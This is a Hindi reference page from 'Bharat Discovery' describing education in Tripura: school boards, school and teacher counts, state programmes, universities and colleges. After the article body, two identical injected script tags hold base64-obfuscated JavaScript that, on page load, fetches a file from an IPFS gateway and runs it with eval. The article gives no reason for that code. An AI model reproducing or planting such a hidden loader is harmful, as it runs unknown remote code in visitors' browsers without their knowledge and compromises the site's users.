त्रिपुरा में शिक्षा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

21 जनवरी 1972 में त्रिपुरा के संपूर्ण राज्य बनने के बाद से शिक्षा के क्षेत्र में राज्य ने तेज गति से विकास किया है। आकार में छोटा लेकिन बेहद ख़ूबसूरत राज्य त्रिपुरा, क्षेत्र और क्षेत्र के बाहर के विद्यार्थिंयों के लिए शिक्षा की बहुत अच्छी सुविधा उपलब्ध करा रहा है। प्रदेश में शासकीय विद्यालयों के साथ-साथ निजी विद्यालय भी संचालित किए जा रहे हैं। धार्मिक शिक्षा प्रदान करने वाले बहुत से धार्मिक संस्थान भी इस छोटे से भारतीय राज्य में अपनी सेवाएं दे रहे हैं।

विद्यालय

त्रिपुरा के विद्यालय या तो त्रिपुरा माध्यमिक शिक्षा बोर्ड (टीबीएसई) या केंद्रीय माध्यमिक शिक्षा बोर्ड (सीबीएसई) से संबद्ध हैं। कुछ विद्यालय कौंसिल फ़ॉर द इंडियन स्कूल सर्टिफिकेट एक्जामिनेशन्स (सीआईएससीई) से भी संबद्ध हैं। प्रदेश में लगभग 4,287 विद्यालय हैं, जिनमें से 2,378 जूनियर बेसिक, 1,139 के लगभग सीनियर बेसिक, 459 उच्च और 311 उच्चतर माध्यमिक विद्यालय राज्य सरकार और एडीसी प्राधिकरण द्वारा चलाए जा रहे हैं। सभी श्रेणियों के 34,985 से अधिक शिक्षक राज्य सरकार द्वारा संचालित इस शिक्षा संजाल को चलायमान रखने में लगे हैं।

शिक्षा विभाग

त्रिपुरा का शिक्षा विभाग अपने पूरे दम-खम के साथ राज्य की शिक्षा व्यवस्था को उच्च गुणवत्तायुक्त तथा प्रगतिशील बनाने में लगा है। राज्य की न केवल साक्षरता बल्कि शिक्षा गुणवत्ता भी बढ़ाने की दिशा में एक मेहनती प्रयास किया जा रहा है। दो प्रमुख कार्यक्रम (1) सर्वशिक्षा अभियान और (2) मध्याह्न भोजन, राज्य में सफलतापूर्वक शिक्षण और गैर-शिक्षण कर्मचारियों के माध्यम से चल रहे हैं। माध्यमिक शिक्षा तक पहुंच के सार्वभौमीकरण के लिए एक और नया कार्यक्रम राष्ट्रीय 'माध्यमिक शिक्षा अभियान' अपने प्रारंभ किए जाने की अवस्था में पहुंच चुका है। यह 2010-11 से प्रारंभ किया जाना है और शिक्षा विभाग इस दिशा में सभी प्रारंभिक क़दम उठा रहा है। विद्यालय शिक्षा विभाग शिक्षा बीच में छोड़ने वालों की संख्या शून्य तक लाने और सर्वशिक्षा अभियान के द्वारा प्रदेश की प्रारंभिक शिक्षा में भागीदारी शत प्रतिशत तक लाने पर ज़ोर दे रही है।

विश्वविद्यालय

प्रदेश में त्रिपुरा विश्वविद्यालय नामक एक केंद्रीय विश्वविद्यालय है, इससे जुड़े 15 शासकीय डिग्री महाविद्यालय, एक राष्ट्रीय प्रौद्योगिकी संस्थान (एनआईटी), दो पॉलीटेक्निक संस्थानों जिनमें से एक ख़ासतौर पर महिलाओं के लिए है, के अलावा त्रिपुरा प्रौद्योगिकी संस्थान (टीआईटी) नामक राज्य का प्रौद्योगिकी संस्थान भी है। दक्षिणी त्रिपुरा ज़िले हेतु एक पॉलीटेक्निक की स्थापना को स्वीकृति मिल चुकी है, जबकि उत्तरी त्रिपुरा और ढ़लाई ज़िले में दो पॉलीटेक्निक संस्थानों की स्थापना निकट भविष्य में होने की उम्मीद है।

महाविद्यालय

राज्य में दो चिकित्सा महाविद्यालय और एक वेटेरनरी, फिशरी और कृषि महाविद्यालय है। भारतीय विद्या भवन द्वारा संचालित एक निजी विज्ञान महाविद्यालय भी है। इक्फाई नामक एक निजी विश्वविद्यालय भी अपनी सेवाएं प्रदान कर रहा है। विभिन्न अनुभागों में उच्च शिक्षा की आकांक्षा रखने वाले विद्यार्थियों की बढ़ रही संख्या की ज़रूरतों को पूरा करने के लिए छह नए शासकीय डिग्री महाविद्यालयों की स्थापना की जाएगी।



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख